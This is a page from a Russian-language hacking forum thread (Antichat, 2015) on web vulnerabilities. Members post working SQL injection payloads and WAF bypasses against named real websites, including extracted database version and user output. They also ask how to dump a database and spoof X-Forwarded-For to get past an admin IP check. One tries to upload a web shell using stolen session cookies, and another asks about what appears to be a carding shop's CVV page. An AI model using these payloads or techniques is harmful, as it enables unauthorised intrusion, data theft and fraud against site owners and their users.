HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 58 из 296 « Первая < 848 54 55 56 57 58 59 60 61 62 68108158 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #571  
Старый 19.09.2015, 22:01
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию
Цитата:
Сообщение от DezMond™  

А limit как перебрать?
Вот пожалуйста, перебирайте:

Цитата:
Сообщение от None  
http://www.die-medienanstalten.de/i...sPersonSearch=a'or(ExtractValue(1,concat(0x3a
,
(select/*!12345*/table_name/*!12345*/from/*!12345*/information_schema.tables/*!12345*/limit/*!12345*/1,1)
)))='1&iSIG=3&iSponsor=14&iFromYear=all&iToYear=al l&sBoolOp=and
 
Ответить с цитированием

  #572  
Старый 19.09.2015, 22:15
Timmkoy
Новичок
Регистрация: 28.07.2015
Сообщений: 8
С нами: 5681846

Репутация: 0
По умолчанию
Есть одна долгая TimeBased sql injection, что с ней можно сделать?

Как слить базу?
 
Ответить с цитированием

  #573  
Старый 20.09.2015, 05:19
ButilkaSoka
Новичок
Регистрация: 04.06.2015
Сообщений: 22
С нами: 5759606

Репутация: 0
По умолчанию
Есть проблема с WAF

Код:
http://www.spbpost.ru/index.php?page_id=305+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+
Пробовал обходить, но не всеми способами.

А тут вообще без понятие что делать, не сталкивался с таким

Код:
http://frostland.pro/shop/search

POST:
search=%cd%e0%e9%f2%e8&searchword=1'%00
хелп
 
Ответить с цитированием

  #574  
Старый 20.09.2015, 06:33
Га-Ноцри
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами: 7670486

Репутация: 76
По умолчанию
По первому линку, как вариант, добиваться вывода не через конструкцию union select, а через XPATH

C пробелами:

Код:
http://www.spbpost.ru/index.php?page_id=305 and extractvalue rand(),concat(0x3a,version(),0x3a,user()))--
Аналог без пробелов:

Код:
http://www.spbpost.ru/index.php?page_id=305*updatexml(0,lpad(user(),22,0x3A),1)#
 
Ответить с цитированием

  #575  
Старый 20.09.2015, 12:31
Br@!ns
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами: 8258006

Репутация: 25


По умолчанию
Цитата:
Сообщение от ButilkaSoka  

Есть проблема с WAF
Код:
http://www.spbpost.ru/index.php?page_id=305+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+
Пробовал обходить, но не всеми способами.
А тут вообще без понятие что делать, не сталкивался с таким
Код:
http://frostland.pro/shop/search

POST:
search=%cd%e0%e9%f2%e8&searchword=1'%00
хелп
во втором случае так же через Error-based вектор:

POST

searchword=asf'or(ExtractValue(1,concat(0x3a,(sele ct(version())))))='1%00&search=%CD%E0%E9%F2%E8'

XPATH syntax error: ':10.0.11-MariaDB'

XPATH syntax error: ':frostla_main@37.187.136.213'

PS в следующий раз, если скуля в месте где нужно быть авторизованым, выкладывайте тестовый акк
 
Ответить с цитированием

  #576  
Старый 21.09.2015, 19:24
ynk
Новичок
Регистрация: 21.09.2015
Сообщений: 3
С нами: 5602646

Репутация: 0
По умолчанию
index.php?p=cvv&CONTRY=&STATE=&City=&TYPE=&BASE=12 .08.2015+MIX&BIN=&sub=Apply+filter

что можно сделать?
 
Ответить с цитированием

  #577  
Старый 21.09.2015, 20:14
ButilkaSoka
Новичок
Регистрация: 04.06.2015
Сообщений: 22
С нами: 5759606

Репутация: 0
По умолчанию
хелп

Есть данные админки, не пускает, походу пускает через ip, но они тоже есть(ip), возможно ли их подставить, если да, то как?
 
Ответить с цитированием

  #578  
Старый 21.09.2015, 20:28
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию
Цитата:
Сообщение от ButilkaSoka  

хелп
Есть данные админки, не пускает, походу пускает через ip, но они тоже есть(ip), возможно ли их подставить, если да, то как?
Если идет обработка IP по заголовку X-Forwarded-For "$_SERVER['HTTP_X_FORWARDED_FOR'];" то можно сделать подмену IP в заголовках хидера

Полезно почитать для понимания:

http://php.net/manual/ru/reserved.variables.php#79359

http://phpfaq.ru/ip
 
Ответить с цитированием

  #579  
Старый 22.09.2015, 12:35
Unknowhacker
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами: 6825206

Репутация: 24
По умолчанию
Столкнулся с проблемой загрузки шелла. Итак, перехватил данные куки - залогился , но когда нажимаю править новость в надежде загрузить шелл, то выскакивает окно Basic Authorization

Код:
http://timer-odessa.net
Log:

Код:
Array
(
[admin] => file
[do] => upload
[ID] =>
[MaterialName] => новая запись
[UrlAlias] =>
[ajax] => 1
[qqfile] => 2.jpg
[tinymcePasteText] => 1
[__cfduid] => d324f6c51adb790a7d0cce7ebea72e8291425213546
[__utma] => 31476155.825643414.1425214893.1442902126.1442908595.874
[__utmb] => 31476155.3.10.1442908595
[__utmc] => 31476155
[__utmz] => 31476155.1441743778.772.137.utmcsr=facebook.com|utmccn=(referral)|utmcmd=referral|utmcct=/
[_ym_visorc_15944878] => w
[PHPSESSID] => 2defc90036f0f83fb04646af0e2ab3dc
)
P.S Уже в учётке менял пароль, все равно это окно выскакивает!
 
Ответить с цитированием

  #580  
Старый 22.09.2015, 12:41
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию
Видимо когда вы оброщаитесь к редактированию, подгружаются модули из папки которая защищена бейсик авторизацией, в перехваченных куках у вас нет куков под бейсик авторизацию.... возможно в вашей админки вам попадется локальный инклуд, где вы сможете найти файлик с паролем от бейсик авторизации...
 
Ответить с цитированием
Ответ
Страница 58 из 296 « Первая < 848 54 55 56 57 58 59 60 61 62 68108158 > Последняя »



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.